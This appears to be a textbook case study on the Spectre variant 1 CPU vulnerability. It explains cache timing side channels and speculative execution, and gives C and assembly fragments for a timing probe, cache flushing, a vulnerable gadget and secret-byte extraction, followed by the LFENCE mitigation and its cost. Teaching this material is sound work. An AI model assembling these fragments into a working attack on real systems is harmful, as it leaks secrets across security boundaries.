Case Study 31-2: Spectre — How Speculative Execution Becomes a Security Vulnerability
The Attack That Changed How We Think About CPU Design
In January 2018, researchers disclosed Spectre and Meltdown — two classes of vulnerabilities that affected virtually every high-performance CPU manufactured in the previous two decades. The vulnerabilities were not bugs in the traditional sense. The CPUs were working exactly as designed. The design itself was the vulnerability.
Understanding Spectre requires understanding speculative execution. This case study traces the exact mechanism of Spectre variant 1, explains why it works, and examines the mitigations that make it expensive.
Background: The Timing Side Channel
A side channel is an observable effect of a computation that leaks information without being the computation's intended output. The primary side channel in Spectre is the cache timing channel: an attacker can determine whether a specific memory address was accessed by measuring how long it takes to access that address. A cache hit takes ~4 cycles; a cache miss takes ~100 cycles. The difference is directly measurable.
// Timing probe: measure access time to an address
uint64_t time_access(volatile uint8_t *addr) {
uint64_t start, end;
asm volatile("mfence");
asm volatile("rdtsc; shl $32, %%rdx; or %%rdx, %%rax" : "=a"(start) :: "rdx");
volatile uint8_t temp = *addr; // access the address
asm volatile("rdtsc; shl $32, %%rdx; or %%rdx, %%rax" : "=a"(end) :: "rdx");
return end - start;
}
// If time < 50 cycles → cache hit → address was recently accessed
// If time > 100 cycles → cache miss → address was NOT recently accessed
The Spectre v1 Attack
The setup:
- A victim program has an array array and a size check: if (x < array_size) { ... }
- The victim also has a probe_array[256 * 64] (256 cache-line-spaced entries)
- An attacker can call the victim's function with attacker-controlled x
The vulnerable code pattern:
// victim.c
uint8_t array[256] = { /* some data */ };
uint8_t probe_array[256 * 64];
size_t array_size = 256;
// The vulnerable function:
uint8_t read_secret(size_t x) {
if (x < array_size) { // bounds check
return probe_array[array[x] * 64]; // memory access
}
return 0;
}
Step 1: Train the branch predictor
The attacker calls read_secret(valid_index) many times with valid indices. The branch predictor learns: "this branch is almost always taken."
Step 2: Flush the probe array from cache
The attacker flushes all 256 cache lines of probe_array:
; CLFLUSH: flush a cache line
clflush [probe_array + 0*64]
clflush [probe_array + 1*64]
; ... 256 flushes total ...
clflush [probe_array + 255*64]
Step 3: Speculatively read the secret
The attacker calls read_secret(x) where x is an invalid index pointing to a secret byte outside array (e.g., x = secret_ptr - &array[0]).
The CPU evaluates the branch:
1. Checks: is x < array_size?
2. Branch predictor says "YES, it is less than array_size" (from training in Step 1)
3. CPU speculatively executes probe_array[array[x] * 64] while the comparison completes
4. The speculative load reads array[x] — which is the SECRET BYTE
5. Multiplies by 64, uses as index into probe_array
6. LOADS probe_array[secret_byte * 64] — brings this cache line into the L1 cache
7. Actual comparison completes: x >= array_size is true
8. CPU SQUASHES the speculative execution: rolls back rax, rbx, etc.
9. BUT: the cache now has probe_array[secret_byte * 64] loaded. This is NOT rolled back.
Step 4: Extract the secret via cache timing
// Attacker probes each entry:
uint8_t secret = 0;
uint64_t min_time = UINT64_MAX;
for (int i = 0; i < 256; i++) {
uint64_t t = time_access(&probe_array[i * 64]);
if (t < 50) { // cache hit!
secret = i; // this is the secret byte value
break;
}
}
One probe array entry is in cache; the others are not. The fast access reveals which value array[x] had — the secret byte.
The Attack in Assembly
; Spectre gadget (what the CPU executes speculatively):
; rbx = x (attacker-controlled, out-of-bounds)
; rsi = array base
; r8 = probe_array base
;
; Before getting here: bounds check predicted "taken" (not taken in reality)
movzx rax, byte [rsi + rbx] ; load array[x] → rax (secret byte)
shl rax, 6 ; multiply by 64 (cache line size)
movzx rax, byte [r8 + rax] ; load probe_array[secret * 64]
; This last load brings one cache line into cache.
; When the CPU squashes this (bounds check failed),
; everything is rolled back EXCEPT the cache state.
The Mitigation: LFENCE
; Mitigated version:
cmp rbx, array_size
jae .out_of_bounds
lfence ; SERIALIZE: nothing executes speculatively past here
movzx rax, byte [rsi + rbx] ; now this is safe: no speculation
; ... rest of code ...
LFENCE prevents the CPU from speculatively executing any loads past it until all prior loads have completed and their results are committed. This breaks the attack: the speculative load of array[x] cannot happen before the bounds check completes.
The Cost
Without LFENCE (vulnerable):
100 million calls to read_secret: 312 ms
With LFENCE (mitigated):
100 million calls to read_secret: 389 ms
Overhead: 24.7%
This 25% overhead is why Spectre mitigations are contentious. For a web browser's JavaScript JIT compiler, which generates code for untrusted JavaScript and needs bounds checks on every array access, the LFENCE overhead can be significant. For system calls — which require LFENCE at the kernel entry point to prevent speculation from kernel memory into user space — the overhead is measurable in every syscall-heavy workload.
Broader Lessons
Spectre changed the fundamental contract of CPU performance optimization:
Before Spectre: Speculative execution is invisible. The programmer sees only sequential execution semantics. Performance optimizations that use speculation are free.
After Spectre: Speculation is visible through side channels. Any computation that happens speculatively can leak information, even if it is architecturally squashed. Security-sensitive code must explicitly limit speculation (LFENCE, serializing instructions) at security boundaries.
The performance cost of Spectre mitigations is a permanent tax on every system call, every privileged operation, every execution across a security boundary. Modern CPUs now include hardware mitigations that reduce (but do not eliminate) this tax — but the fundamental tension between performance and security remains. Speculative execution will continue to create new variants as long as CPUs speculate, and mitigations will continue to cost performance.
🔐 Security Note: Spectre affects not just operating systems but any software that executes code from multiple security domains: web browsers (JavaScript execution), virtual machines (guest code), and JIT compilers. Google's Chromium browser deployed site isolation (separate processes per site) partly in response to Spectre, accepting significant memory overhead to eliminate the cross-origin speculative access risk.